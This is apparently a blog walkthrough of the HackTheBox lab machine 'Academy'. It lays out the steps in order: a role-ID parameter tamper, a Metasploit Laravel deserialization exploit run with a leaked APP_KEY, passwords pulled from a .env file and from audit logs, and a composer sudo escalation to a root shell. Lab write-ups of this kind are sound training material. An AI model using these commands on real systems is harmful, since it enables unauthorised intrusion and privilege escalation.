HackTheBox: (“Academy”) — Walkthrough

Hi people :D

Today we’ll solve “Academy” machine from HackTheBox, an easy machine with good ideas, let’s get started.

Info

Enumeration

— — — — — — —

Start with Nmap

nmap -A 10.10.10.215

We have two ports, 22 ( SSH ) and 80 ( HTTP ), add machine IP as academy.htb to /etc/hosts file.

Web Enumeration

— — — — — — — —

Now go to your browser and navigate to http://academy.htp

There is a register function so let’s open Burp Suite and make an account

I noticed that is a roleid parameter, if you familiar with Web pentesting you know that this kind of parameters often vulnerable to Parameter-based access control vulnerability

Now change the roleid value to 1 then login with your account

After login, you’ll be redirected to this page that looks like the original HackTheBox Academy site. run any directory brute forcer tool such as dirsearch, you’ll find admin directory

./dirsearch.py -u http://academy.htb/ -e "*" -x 500-599,400-499

Navigate to the admin directory, you will find useful information such as dev domain and two users ( cry0l1t3 & mrb3n )

Add dev-staging-01.academy.htb to /etc/hosts then move to it

Scroll down a bit, you will see that the website uses Laravel, and you will also find the APP_KEY

Exploitation

— — — — — —

I searched for any exploit for Laravel and I found this Metasploit module

Let’s try this module, first set up the module options then run it

1. use exploit/unix/http/laravel_token_unserialize_exec
2. set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
3. set RHOSTS 10.10.10.215
4. set VHOST dev-staging-01.academy.htb
5. set LHOST tun0
6. exploit

And we got a www-data shell ☺

User Flag

— — — — —

Make some improvements to our shell with :

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=linux

then do ls -la command to show hidden files, we found .env file so let’s read it

We found a password (mySup3rP4s5w0rd!!) try this password with cry0l1t3 user and we got a shell

Simply go to home directory and read user.txt file to get the flag

Root Flag

— — — — —

Unfortunately, we can not run sudo -l command with our privilege

After some search, I found 4 logs files in /var/logs/audit directory

These files contain a huge amount of data that makes reading them a waste of time so that I tried to grep for important strings like Password, pass, admin,sudo, su, etc..

I noticed that these files contain “comm=” string followed by any command like this: comm=“whoami”, This made the grep process much faster

I have tried some strings and found some hex data when I greped for su command

6D7262336E5F41634064336D79210A

Change this data from hex to ASCII by using any online website like this site

We found another password (mrb3n_Ac@d3my!) that seems to be mrb3n’s password

Now try sudo -l command

We can run composer as root without a password.
when I know what I can run with root privileges, I go directly to GTFOBins website, after I searched for composer sudo exploit in gtfobins I found these commands

Just copy & paste these commands :

1. TF=$(mktemp -d)
2. echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
3. sudo composer --working-dir=$TF run-script x

After that we get a root shell, simply read root.txt and congrats! ☺

Thanks for your reading and I hope this writeup was useful to you ❤